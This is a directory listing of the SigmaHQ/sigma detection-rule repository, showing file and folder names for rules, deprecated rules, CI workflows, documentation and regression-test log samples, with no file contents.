Repository: SigmaHQ/sigma
Branch: master
Commit: a15dbdaa057a
Files: 4472
Total size: 6.8 MB
Directory structure:
gitextract_6lfx6dd0/
├── .gitattributes
├── .github/
│ ├── FUNDING.yml
│ ├── ISSUE_TEMPLATE/
│ │ ├── false_positive_report.yml
│ │ └── rule_proposal.md
│ ├── PULL_REQUEST_TEMPLATE.md
│ ├── labeler.yml
│ ├── latest_archiver_output.md
│ └── workflows/
│ ├── goodlog-tests.yml
│ ├── greetings.yml
│ ├── known-FPs.csv
│ ├── matchgrep.sh
│ ├── pr-labeler.yml
│ ├── ref-archiver.yml
│ ├── regression-tests.yml
│ ├── release.yml
│ ├── sigma-rule-deprecated.yml
│ ├── sigma-rule-promoter.yml
│ ├── sigma-test.yml
│ ├── sigma-validation.yml
│ └── update-heatmap.yml
├── .gitignore
├── .yamllint
├── CONTRIBUTING.md
├── LICENSE
├── README.md
├── Releases.md
├── deprecated/
│ ├── README.md
│ ├── cloud/
│ │ ├── azure_app_credential_modification.yml
│ │ └── azure_app_permissions_for_api.yml
│ ├── deprecated.csv
│ ├── deprecated.json
│ ├── linux/
│ │ ├── lnx_auditd_alter_bash_profile.yml
│ │ ├── lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml
│ │ └── lnx_space_after_filename_.yml
│ ├── macos/
│ │ ├── proc_creation_macos_add_to_admin_group.yml
│ │ └── proc_creation_macos_malware_amos_filegrabber_exec.yml
│ ├── other/
│ │ └── generic_brute_force.yml
│ ├── web/
│ │ ├── proxy_apt_domestic_kitten.yml
│ │ ├── proxy_cobalt_amazon.yml
│ │ ├── proxy_cobalt_malformed_uas.yml
│ │ ├── proxy_cobalt_ocsp.yml
│ │ ├── proxy_cobalt_onedrive.yml
│ │ ├── proxy_ios_implant.yml
│ │ └── proxy_webdav_search_ms.yml
│ └── windows/
│ ├── create_remote_thread_win_susp_remote_thread_target.yml
│ ├── driver_load_win_mal_creddumper.yml
│ ├── driver_load_win_mal_poortry_driver.yml
│ ├── driver_load_win_powershell_script_installed_as_service.yml
│ ├── driver_load_win_vuln_avast_anti_rootkit_driver.yml
│ ├── driver_load_win_vuln_dell_driver.yml
│ ├── driver_load_win_vuln_drivers_names.yml
│ ├── driver_load_win_vuln_gigabyte_driver.yml
│ ├── driver_load_win_vuln_hw_driver.yml
│ ├── driver_load_win_vuln_lenovo_driver.yml
│ ├── file_event_win_access_susp_teams.yml
│ ├── file_event_win_access_susp_unattend_xml.yml
│ ├── file_event_win_crackmapexec_patterns.yml
│ ├── file_event_win_hktl_createminidump.yml
│ ├── file_event_win_lsass_memory_dump_file_creation.yml
│ ├── file_event_win_mimikatz_memssp_log_file.yml
│ ├── file_event_win_office_outlook_rdp_file_creation.yml
│ ├── file_event_win_susp_clr_logs.yml
│ ├── image_load_alternate_powershell_hosts_moduleload.yml
│ ├── image_load_office_dsparse_dll_load.yml
│ ├── image_load_office_kerberos_dll_load.yml
│ ├── image_load_side_load_advapi32.yml
│ ├── image_load_side_load_scm.yml
│ ├── image_load_side_load_svchost_dlls.yml
│ ├── image_load_susp_uncommon_image_load.yml
│ ├── image_load_susp_winword_wmidll_load.yml
│ ├── net_connection_win_binary_github_com.yml
│ ├── net_connection_win_reddit_api_non_browser_access.yml
│ ├── net_connection_win_susp_epmap.yml
│ ├── pipe_created_psexec_pipes_artifacts.yml
│ ├── posh_pm_powercat.yml
│ ├── posh_ps_access_to_chrome_login_data.yml
│ ├── posh_ps_azurehound_commands.yml
│ ├── posh_ps_cl_invocation_lolscript.yml
│ ├── posh_ps_cl_mutexverifiers_lolscript.yml
│ ├── posh_ps_dnscat_execution.yml
│ ├── posh_ps_exchange_mailbox_smpt_forwarding_rule.yml
│ ├── posh_ps_file_and_directory_discovery.yml
│ ├── posh_ps_invoke_nightmare.yml
│ ├── posh_ps_susp_gwmi.yml
│ ├── powershell_ps_susp_win32_shadowcopy.yml
│ ├── powershell_suspicious_download.yml
│ ├── powershell_suspicious_invocation_generic.yml
│ ├── powershell_suspicious_invocation_specific.yml
│ ├── powershell_syncappvpublishingserver_exe.yml
│ ├── proc_access_win_in_memory_assembly_execution.yml
│ ├── proc_access_win_lazagne_cred_dump_lsass_access.yml
│ ├── proc_access_win_lsass_susp_access.yml
│ ├── proc_access_win_pypykatz_cred_dump_lsass_access.yml
│ ├── proc_access_win_susp_invoke_patchingapi.yml
│ ├── proc_creation_win_apt_apt29_thinktanks.yml
│ ├── proc_creation_win_apt_dragonfly.yml
│ ├── proc_creation_win_apt_gallium.yml
│ ├── proc_creation_win_apt_hurricane_panda.yml
│ ├── proc_creation_win_apt_lazarus_activity_apr21.yml
│ ├── proc_creation_win_apt_lazarus_loader.yml
│ ├── proc_creation_win_apt_muddywater_dnstunnel.yml
│ ├── proc_creation_win_apt_ta505_dropper.yml
│ ├── proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml
│ ├── proc_creation_win_certutil_susp_execution.yml
│ ├── proc_creation_win_cmd_read_contents.yml
│ ├── proc_creation_win_cmd_redirect_to_stream.yml
│ ├── proc_creation_win_credential_acquisition_registry_hive_dumping.yml
│ ├── proc_creation_win_cscript_vbs.yml
│ ├── proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml
│ ├── proc_creation_win_filefix_browsers.yml
│ ├── proc_creation_win_indirect_cmd.yml
│ ├── proc_creation_win_indirect_command_execution_forfiles.yml
│ ├── proc_creation_win_invoke_obfuscation_via_rundll.yml
│ ├── proc_creation_win_invoke_obfuscation_via_use_rundll32.yml
│ ├── proc_creation_win_lolbas_execution_of_wuauclt.yml
│ ├── proc_creation_win_lolbin_findstr.yml
│ ├── proc_creation_win_lolbin_office.yml
│ ├── proc_creation_win_lolbin_rdrleakdiag.yml
│ ├── proc_creation_win_lolbins_by_office_applications.yml
│ ├── proc_creation_win_mal_ryuk.yml
│ ├── proc_creation_win_malware_trickbot_recon_activity.yml
│ ├── proc_creation_win_mavinject_proc_inj.yml
│ ├── proc_creation_win_msdt_diagcab.yml
│ ├── proc_creation_win_new_service_creation.yml
│ ├── proc_creation_win_nslookup_pwsh_download_cradle.yml
│ ├── proc_creation_win_odbcconf_susp_exec.yml
│ ├── proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml
│ ├── proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml
│ ├── proc_creation_win_office_spawning_wmi_commandline.yml
│ ├── proc_creation_win_possible_applocker_bypass.yml
│ ├── proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml
│ ├── proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml
│ ├── proc_creation_win_powershell_base64_listing_shadowcopy.yml
│ ├── proc_creation_win_powershell_base64_shellcode.yml
│ ├── proc_creation_win_powershell_bitsjob.yml
│ ├── proc_creation_win_powershell_download_cradles.yml
│ ├── proc_creation_win_powershell_service_modification.yml
│ ├── proc_creation_win_powershell_susp_ps_downloadfile.yml
│ ├── proc_creation_win_powershell_xor_encoded_command.yml
│ ├── proc_creation_win_reg_dump_sam.yml
│ ├── proc_creation_win_regsvr32_anomalies.yml
│ ├── proc_creation_win_renamed_paexec.yml
│ ├── proc_creation_win_renamed_powershell.yml
│ ├── proc_creation_win_renamed_psexec.yml
│ ├── proc_creation_win_renamed_rundll32.yml
│ ├── proc_creation_win_root_certificate_installed.yml
│ ├── proc_creation_win_run_from_zip.yml
│ ├── proc_creation_win_rundll32_js_runhtmlapplication.yml
│ ├── proc_creation_win_rundll32_script_run.yml
│ ├── proc_creation_win_sc_delete_av_services.yml
│ ├── proc_creation_win_schtasks_user_temp.yml
│ ├── proc_creation_win_service_stop.yml
│ ├── proc_creation_win_susp_bitstransfer.yml
│ ├── proc_creation_win_susp_cmd_exectution_via_wmi.yml
│ ├── proc_creation_win_susp_commandline_chars.yml
│ ├── proc_creation_win_susp_lolbin_non_c_drive.yml
│ ├── proc_creation_win_susp_run_folder.yml
│ ├── proc_creation_win_susp_squirrel_lolbin.yml
│ ├── proc_creation_win_sysinternals_psexec_service_execution.yml
│ ├── proc_creation_win_sysinternals_psexesvc_start.yml
│ ├── proc_creation_win_whoami_as_system.yml
│ ├── proc_creation_win_whoami_execution.yml
│ ├── proc_creation_win_winword_dll_load.yml
│ ├── proc_creation_win_wmic_execution_via_office_process.yml
│ ├── proc_creation_win_wmic_remote_command.yml
│ ├── proc_creation_win_wmic_remote_service.yml
│ ├── proc_creation_win_wuauclt_execution.yml
│ ├── process_creation_syncappvpublishingserver_exe.yml
│ ├── registry_add_sysinternals_sdelete_registry_keys.yml
│ ├── registry_event_asep_reg_keys_modification.yml
│ ├── registry_set_abusing_windows_telemetry_for_persistence.yml
│ ├── registry_set_add_hidden_user.yml
│ ├── registry_set_creation_service_uncommon_folder.yml
│ ├── registry_set_disable_microsoft_office_security_features.yml
│ ├── registry_set_malware_adwind.yml
│ ├── registry_set_office_security.yml
│ ├── registry_set_persistence_com_hijacking_susp_locations.yml
│ ├── registry_set_persistence_search_order.yml
│ ├── registry_set_silentprocessexit.yml
│ ├── sysmon_accessing_winapi_in_powershell_credentials_dumping.yml
│ ├── sysmon_dcom_iertutil_dll_hijack.yml
│ ├── sysmon_mimikatz_detection_lsass.yml
│ ├── sysmon_powershell_execution_moduleload.yml
│ ├── sysmon_rclone_execution.yml
│ ├── win_defender_disabled.yml
│ ├── win_dsquery_domain_trust_discovery.yml
│ ├── win_lateral_movement_condrv.yml
│ ├── win_security_event_log_cleared.yml
│ ├── win_security_group_modification_logging.yml
│ ├── win_security_lolbas_execution_of_nltest.yml
│ ├── win_security_windows_defender_exclusions_write_deleted.yml
│ ├── win_susp_esentutl_activity.yml
│ ├── win_susp_rclone_exec.yml
│ ├── win_susp_vssadmin_ntds_activity.yml
│ ├── win_system_service_install_susp_double_ampersand.yml
│ └── win_system_susp_sam_dump.yml
├── documentation/
│ ├── README.md
│ ├── logsource-guides/
│ │ ├── other/
│ │ │ └── antivirus.md
│ │ └── windows/
│ │ ├── category/
│ │ │ ├── process_creation.md
│ │ │ ├── ps_module.md
│ │ │ ├── ps_script.md
│ │ │ ├── registry_add.md
│ │ │ ├── registry_delete.md
│ │ │ ├── registry_event.md
│ │ │ ├── registry_rename.md
│ │ │ └── registry_set.md
│ │ └── service/
│ │ ├── powershell.md
│ │ └── security.md
│ └── tools/
│ └── sigma-logsource-checker.py
├── other/
│ ├── godmode_sigma_rule.yml
│ └── sigma_attack_nav_coverage.json
├── regression_data/
│ ├── rules/
│ │ └── windows/
│ │ ├── file/
│ │ │ └── file_event/
│ │ │ ├── file_event_win_advanced_ip_scanner/
│ │ │ │ ├── fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx
│ │ │ │ ├── fed85bf9-e075-4280-9159-fbe8a023d6fa.json
│ │ │ │ └── info.yml
│ │ │ ├── file_event_win_anydesk_artefact/
│ │ │ │ ├── 0b9ad457-2554-44c1-82c2-d56a99c42377.evtx
│ │ │ │ ├── 0b9ad457-2554-44c1-82c2-d56a99c42377.json
│ │ │ │ └── info.yml
│ │ │ ├── file_event_win_create_evtx_non_common_locations/
│ │ │ │ ├── 65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx
│ │ │ │ ├── 65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json
│ │ │ │ └── info.yml
│ │ │ ├── file_event_win_create_non_existent_dlls/
│ │ │ │ ├── df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx
│ │ │ │ ├── df6ecb8b-7822-4f4b-b412-08f524b4576c.json
│ │ │ │ └── info.yml
│ │ │ ├── file_event_win_creation_new_shim_database/
│ │ │ │ ├── ee63c85c-6d51-4d12-ad09-04e25877a947.evtx
│ │ │ │ ├── ee63c85c-6d51-4d12-ad09-04e25877a947.json
│ │ │ │ └── info.yml
│ │ │ ├── file_event_win_creation_system_dll_files/
│ │ │ │ ├── 13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx
│ │ │ │ ├── 13c02350-4177-4e45-ac17-cf7ca628ff5e.json
│ │ │ │ └── info.yml
│ │ │ ├── file_event_win_creation_system_file/
│ │ │ │ ├── d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx
│ │ │ │ ├── d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json
│ │ │ │ └── info.yml
│ │ │ ├── file_event_win_cred_dump_tools_dropped_files/
│ │ │ │ ├── 8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx
│ │ │ │ ├── 8fbf3271-1ef6-4e94-8210-03c2317947f6.json
│ │ │ │ └── info.yml
│ │ │ ├── file_event_win_dump_file_susp_creation/
│ │ │ │ ├── aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx
│ │ │ │ ├── aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json
│ │ │ │ └── info.yml
│ │ │ ├── file_event_win_susp_legitimate_app_dropping_in_uncommon_location/
│ │ │ │ ├── 1cf465a1-2609-4c15-9b66-c32dbe4bfd67.evtx
│ │ │ │ ├── 1cf465a1-2609-4c15-9b66-c32dbe4bfd67.json
│ │ │ │ └── info.yml
│ │ │ ├── file_event_win_susp_lnk_double_extension/
│ │ │ │ ├── 3215aa19-f060-4332-86d5-5602511f3ca8.evtx
│ │ │ │ ├── 3215aa19-f060-4332-86d5-5602511f3ca8.json
│ │ │ │ └── info.yml
│ │ │ ├── file_event_win_susp_public_folder_extension/
│ │ │ │ ├── b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx
│ │ │ │ ├── b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json
│ │ │ │ └── info.yml
│ │ │ ├── file_event_win_susp_recycle_bin_fake_exec/
│ │ │ │ ├── cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx
│ │ │ │ ├── cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json
│ │ │ │ └── info.yml
│ │ │ └── file_event_win_taskmgr_lsass_dump/
│ │ │ ├── 69ca12af-119d-44ed-b50f-a47af0ebc364.evtx
│ │ │ ├── 69ca12af-119d-44ed-b50f-a47af0ebc364.json
│ │ │ └── info.yml
│ │ ├── image_load/
│ │ │ ├── image_load_side_load_cpl_from_non_system_location/
│ │ │ │ ├── 2b140a5c-dc02-4bb8-b6b1-8bdb45714cde.evtx
│ │ │ │ ├── 2b140a5c-dc02-4bb8-b6b1-8bdb45714cde.json
│ │ │ │ └── info.yml
│ │ │ └── image_load_win_susp_dbgcore_dbghelp_load/
│ │ │ ├── 416bc4a2-7217-4519-8dc7-c3271817f1d5.evtx
│ │ │ ├── 416bc4a2-7217-4519-8dc7-c3271817f1d5.json
│ │ │ └── info.yml
│ │ ├── process_access/
│ │ │ ├── proc_access_win_susp_dbgcore_dbghelp_load/
│ │ │ │ ├── 9f5c1d59-33be-4e60-bcab-85d2f566effd.evtx
│ │ │ │ ├── 9f5c1d59-33be-4e60-bcab-85d2f566effd.json
│ │ │ │ └── info.yml
│ │ │ └── proc_access_win_werfaultsecure_msmpeng_access/
│ │ │ ├── 387df17d-3b04-448f-8669-9e7fd5e5fd8c.evtx
│ │ │ ├── 387df17d-3b04-448f-8669-9e7fd5e5fd8c.json
│ │ │ └── info.yml
│ │ ├── process_creation/
│ │ │ ├── proc_creation_win_amsi_registry_tampering/
│ │ │ │ ├── 7dbbcac2-57a0-45ac-b306-ff30a8bd2981.evtx
│ │ │ │ ├── 7dbbcac2-57a0-45ac-b306-ff30a8bd2981.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_bitsadmin_download/
│ │ │ │ ├── d059842b-6b9d-4ed1-b5c3-5b89143c6ede.evtx
│ │ │ │ ├── d059842b-6b9d-4ed1-b5c3-5b89143c6ede.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_bitsadmin_download_direct_ip/
│ │ │ │ ├── 99c840f2-2012-46fd-9141-c761987550ef.evtx
│ │ │ │ ├── 99c840f2-2012-46fd-9141-c761987550ef.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_bitsadmin_download_file_sharing_domains/
│ │ │ │ ├── 8518ed3d-f7c9-4601-a26c-f361a4256a0c.evtx
│ │ │ │ ├── 8518ed3d-f7c9-4601-a26c-f361a4256a0c.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_bitsadmin_download_susp_extensions/
│ │ │ │ ├── 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200.evtx
│ │ │ │ ├── 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_bitsadmin_download_susp_targetfolder/
│ │ │ │ ├── 2ddef153-167b-4e89-86b6-757a9e65dcac.evtx
│ │ │ │ ├── 2ddef153-167b-4e89-86b6-757a9e65dcac.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_browsers_chromium_headless_file_download/
│ │ │ │ ├── 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx
│ │ │ │ ├── 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_browsers_chromium_load_extension/
│ │ │ │ ├── 88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx
│ │ │ │ ├── 88d6e60c-759d-4ac1-a447-c0f1466c2d21.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_browsers_chromium_mockbin_abuse/
│ │ │ │ ├── 1c526788-0abe-4713-862f-b520da5e5316.evtx
│ │ │ │ ├── 1c526788-0abe-4713-862f-b520da5e5316.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_browsers_chromium_susp_load_extension/
│ │ │ │ ├── 27ba3207-dd30-4812-abbf-5d20c57d474e.evtx
│ │ │ │ ├── 27ba3207-dd30-4812-abbf-5d20c57d474e.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_browsers_inline_file_download/
│ │ │ │ ├── 94771a71-ba41-4b6e-a757-b531372eaab6.evtx
│ │ │ │ ├── 94771a71-ba41-4b6e-a757-b531372eaab6.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_browsers_tor_execution/
│ │ │ │ ├── 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx
│ │ │ │ ├── 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_certutil_certificate_installation/
│ │ │ │ ├── d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx
│ │ │ │ ├── d2125259-ddea-4c1c-9c22-977eb5b29cf0.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_certutil_decode/
│ │ │ │ ├── cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx
│ │ │ │ ├── cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_certutil_download/
│ │ │ │ ├── 19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx
│ │ │ │ ├── 19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_certutil_download_direct_ip/
│ │ │ │ ├── 13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx
│ │ │ │ ├── 13e6fe51-d478-4c7e-b0f2-6da9b400a829.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_certutil_download_file_sharing_domains/
│ │ │ │ ├── 42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx
│ │ │ │ ├── 42a5f1e7-9603-4f6d-97ae-3f37d130d794.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_certutil_encode/
│ │ │ │ ├── e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx
│ │ │ │ ├── e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_certutil_encode_susp_extensions/
│ │ │ │ ├── ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx
│ │ │ │ ├── ea0cdc3e-2239-4f26-a947-4e8f8224e464.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_certutil_encode_susp_location/
│ │ │ │ ├── 82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx
│ │ │ │ ├── 82a6714f-4899-4f16-9c1e-9a333544d4c3.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_certutil_export_pfx/
│ │ │ │ ├── 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx
│ │ │ │ ├── 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_certutil_ntlm_coercion/
│ │ │ │ ├── 6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx
│ │ │ │ ├── 6c6d9280-e6d0-4b9d-80ac-254701b64916.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_chcp_codepage_lookup/
│ │ │ │ ├── 7090adee-82e2-4269-bd59-80691e7c6338.evtx
│ │ │ │ ├── 7090adee-82e2-4269-bd59-80691e7c6338.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_chcp_codepage_switch/
│ │ │ │ ├── c7942406-33dd-4377-a564-0f62db0593a3.evtx
│ │ │ │ ├── c7942406-33dd-4377-a564-0f62db0593a3.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_cipher_overwrite_deleted_data/
│ │ │ │ ├── 4b046706-5789-4673-b111-66f25fe99534.evtx
│ │ │ │ ├── 4b046706-5789-4673-b111-66f25fe99534.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_clip_execution/
│ │ │ │ ├── ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx
│ │ │ │ ├── ddeff553-5233-4ae9-bbab-d64d2bd634be.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_cmd_assoc_execution/
│ │ │ │ ├── 3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx
│ │ │ │ ├── 3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_cmd_dir_execution/
│ │ │ │ ├── 7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx
│ │ │ │ ├── 7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_cmd_launched_with_hidden_start_flag/
│ │ │ │ ├── 5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d.evtx
│ │ │ │ ├── 5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_cmd_mklink_osk_cmd/
│ │ │ │ ├── e9b61244-893f-427c-b287-3e708f321c6b.evtx
│ │ │ │ ├── e9b61244-893f-427c-b287-3e708f321c6b.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_cmd_rmdir_execution/
│ │ │ │ ├── 41ca393d-538c-408a-ac27-cf1e038be80c.evtx
│ │ │ │ ├── 41ca393d-538c-408a-ac27-cf1e038be80c.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_cmdkey_adding_generic_creds/
│ │ │ │ ├── b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx
│ │ │ │ ├── b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_cmdkey_recon/
│ │ │ │ ├── 07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx
│ │ │ │ ├── 07f8bdc2-c9b3-472a-9817-5a670b872f53.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_conhost_headless_powershell/
│ │ │ │ ├── 056c7317-9a09-4bd4-9067-d051312752ea.evtx
│ │ │ │ ├── 056c7317-9a09-4bd4-9067-d051312752ea.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_credential_guard_registry_tampering/
│ │ │ │ ├── c17d47b7-dcd6-4109-87eb-d1817bd4cbc9.evtx
│ │ │ │ ├── c17d47b7-dcd6-4109-87eb-d1817bd4cbc9.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_curl_cookie_hijacking/
│ │ │ │ ├── 5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx
│ │ │ │ ├── 5a6e1e16-07de-48d8-8aae-faa766c05e88.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_curl_custom_user_agent/
│ │ │ │ ├── 85de1f22-d189-44e4-8239-dc276b45379b.evtx
│ │ │ │ ├── 85de1f22-d189-44e4-8239-dc276b45379b.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_curl_download_direct_ip_exec/
│ │ │ │ ├── 9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx
│ │ │ │ ├── 9cc85849-3b02-4cb5-b371-3a1ff54f2218.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_curl_download_direct_ip_susp_extensions/
│ │ │ │ ├── 5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx
│ │ │ │ ├── 5cb299fc-5fb1-4d07-b989-0644c68b6043.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_curl_download_susp_file_sharing_domains/
│ │ │ │ ├── 56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx
│ │ │ │ ├── 56454143-524f-49fb-b1c6-3fb8b1ad41fb.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_curl_insecure_connection/
│ │ │ │ ├── cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx
│ │ │ │ ├── cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_curl_insecure_proxy_or_doh/
│ │ │ │ ├── 2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx
│ │ │ │ ├── 2c1486f5-02e8-4f86-9099-b97f2da4ed77.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_curl_local_file_read/
│ │ │ │ ├── aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx
│ │ │ │ ├── aa6f6ea6-0676-40dd-b510-6e46f02d8867.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_curl_susp_download/
│ │ │ │ ├── e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx
│ │ │ │ ├── e218595b-bbe7-4ee5-8a96-f32a24ad3468.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_devcon_disable_vmci_driver/
│ │ │ │ ├── 85f520e7-6f5e-43ca-874c-222e5bf9c0de.evtx
│ │ │ │ ├── 85f520e7-6f5e-43ca-874c-222e5bf9c0de.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_dirlister_execution/
│ │ │ │ ├── b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx
│ │ │ │ ├── b4dc61f5-6cce-468e-a608-b48b469feaa2.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_discovery_via_reg_queries/
│ │ │ │ ├── 0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx
│ │ │ │ ├── 0022869c-49f7-4ff2-ba03-85ac42ddac58.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_dism_remove/
│ │ │ │ ├── 43e32da2-fdd0-4156-90de-50dfd62636f9.evtx
│ │ │ │ ├── 43e32da2-fdd0-4156-90de-50dfd62636f9.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_driverquery_recon/
│ │ │ │ ├── 9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx
│ │ │ │ ├── 9fc3072c-dc8f-4bf7-b231-18950000fadd.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_driverquery_usage/
│ │ │ │ ├── a20def93-0709-4eae-9bd2-31206e21e6b2.evtx
│ │ │ │ ├── a20def93-0709-4eae-9bd2-31206e21e6b2.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_dsquery_domain_trust_discovery/
│ │ │ │ ├── 3bad990e-4848-4a78-9530-b427d854aac0.evtx
│ │ │ │ ├── 3bad990e-4848-4a78-9530-b427d854aac0.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_dtrace_kernel_dump/
│ │ │ │ ├── 7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx
│ │ │ │ ├── 7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_explorer_folder_shortcut_via_shell_binary/
│ │ │ │ ├── c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx
│ │ │ │ ├── c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_findstr_gpp_passwords/
│ │ │ │ ├── 91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx
│ │ │ │ ├── 91a2c315-9ee6-4052-a853-6f6a8238f90d.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_findstr_lsass/
│ │ │ │ ├── fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx
│ │ │ │ ├── fe63010f-8823-4864-a96b-a7b4a0f7b929.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_findstr_recon_everyone/
│ │ │ │ ├── 47e4bab7-c626-47dc-967b-255608c9a920.evtx
│ │ │ │ ├── 47e4bab7-c626-47dc-967b-255608c9a920.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_findstr_recon_pipe_output/
│ │ │ │ ├── ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx
